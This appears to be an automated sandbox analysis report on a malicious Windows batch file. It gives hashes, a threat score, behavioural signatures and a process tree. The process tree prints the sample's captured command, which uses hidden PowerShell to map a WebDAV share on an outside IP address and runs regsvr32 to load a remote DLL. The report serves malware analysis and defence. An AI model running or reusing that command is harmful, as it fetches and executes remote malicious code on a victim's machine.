Analysis
-
max time kernel
101s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
22/07/2024, 21:03
Static task
static1
Behavioral task
behavioral1
Sample
29675268181591712425.bat
Resource
win7-20240704-en
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
29675268181591712425.bat
Resource
win10v2004-20240709-en
8 signatures
150 seconds
General
-
Target
29675268181591712425.bat
-
Size
18KB
-
MD5
3e306297f24cbe07c86e6f5e097e0cb2
-
SHA1
32dd95e0bb8bd51c90d2990a8ba0b9ebfd0adddd
-
SHA256
ac3f2365dc070bd0b7e2a53db6337a4909d276c74a1e372328863d2225a41572
-
SHA512
c746d0b51f87e6d26e23340a29304e33754175068ec035eeffaa4030a0463f03c49d878481a0c6a1910a860a8208e9f809c07f4284f66db51edd8c564865d046
-
SSDEEP
384:oz1qC3RyVFsQ4S/4+9TFZKRtiheRaTVJjakxVLF1nGsJE3CqK+Q9J:or3RygXklFZyRGBrpnnxWmJ
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2120 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2120 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2120 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2196 wordpad.exe 2196 wordpad.exe 2196 wordpad.exe 2196 wordpad.exe 2196 wordpad.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 2028 wrote to memory of 2196 2028 cmd.exe 30 PID 2028 wrote to memory of 2196 2028 cmd.exe 30 PID 2028 wrote to memory of 2196 2028 cmd.exe 30 PID 2028 wrote to memory of 2120 2028 cmd.exe 31 PID 2028 wrote to memory of 2120 2028 cmd.exe 31 PID 2028 wrote to memory of 2120 2028 cmd.exe 31 PID 2120 wrote to memory of 2648 2120 powershell.exe 33 PID 2120 wrote to memory of 2648 2120 powershell.exe 33 PID 2120 wrote to memory of 2648 2120 powershell.exe 33 PID 2120 wrote to memory of 2568 2120 powershell.exe 34 PID 2120 wrote to memory of 2568 2120 powershell.exe 34 PID 2120 wrote to memory of 2568 2120 powershell.exe 34 PID 2120 wrote to memory of 2568 2120 powershell.exe 34 PID 2120 wrote to memory of 2568 2120 powershell.exe 34
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\29675268181591712425.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:2196
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden net use \\45.9.74.36@8888\davwwwroot\ ; regsvr32 /s \\45.9.74.36@8888\davwwwroot\2889238204240.dll2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2120 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\45.9.74.36@8888\davwwwroot\3⤵PID:2648
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\45.9.74.36@8888\davwwwroot\2889238204240.dll3⤵PID:2568
-
-